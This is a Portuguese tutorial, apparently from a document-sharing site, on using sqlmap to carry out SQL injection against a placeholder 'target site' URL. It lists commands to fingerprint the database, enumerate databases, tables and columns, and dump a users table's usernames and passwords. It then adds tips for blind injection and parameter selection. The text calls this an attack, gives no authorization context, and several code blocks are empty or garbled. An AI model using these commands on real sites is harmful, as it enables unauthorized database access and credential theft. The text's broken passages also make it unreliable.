Escolar Documentos
Profissional Documentos
Cultura Documentos
Linux Comandos
Linux Comandos
-------------------------------------------------
SQLMAP------------------------------------------------------
------
descobrir qual tipo e vers�o do banco de dados determinado site est� usando.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -b
Sqli � um tipo de ataque que a cada etapa vamos obtendo mais informa��es, agora que
sabemos a vers�o e o tipo de banco de dados, vamos obter o nome do banco de dados
atual, isso �, o banco de dados que est� sendo usado no site alvo.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" --current-db
---------
Pode ser que existam mais bancos de dados, ent�o vamos verificar.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" --dbs
----------
Mostrar as tabelas.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -D acuart
--tables
----------
Vamos supor que voc� ache que tem algo interessante na tabela users, hora de listar
as colunas.
C�digo:
�url:URL Alvo.
-D:Banco de dados alvo.
-T:Tabela alvo.
�columns:Listar colunas.
----------
Finalmente vamos agora extrair os dados das colunas que achamos interessantes.
C�digo:
./sqlmap.py --url "http://www.sitealvo.com/listproducts.php?cat=1" -D acuart -T
users -C 'uname,pass' --dump
----------
Isso � o b�sico dos comandos, vou mostrar agora alguns comandos adicionais.
Excluir do ataque o banco de dados do sistema. Sempre que voc� ver que o sqlmap
est� fazendo consultas ao banco de dados information_schema, voc� pode se desejar
acrescentar �exclude-sysdbs, que vai fazer o sqlmap n�o fazer queries a esse banco.
----------
----------
----------
Usando uma string para tornar o Blind SQL Injection mais eficiente. O teste mais
comum para saber se uma url � vulner�vel a blind SQLI � verificar se o conte�do
muda ap�s uma query maliciosa, fornecer uma palavra que existe na p�gina ajuda o
sqlmap a fazer um teste mais eficiente.
C�digo:
Selecionando o par�metro a ser testado. Voc� pode se deparar com uma p�gina com
v�rios par�metros a serem testados, por exemplo
index.php?option=com_jcars&view=browse&start=15&li
mit=5&sort=brand&updn=ASC&filter?id=12
O sqlmap interpreta cada = como um possivel campo a enviar os testes, mas se voc�
sabe que o par�metro id � o vulner�vel, voc� pode especificar logo, em vez de
esperar o sqlmap testar todos.
C�digo: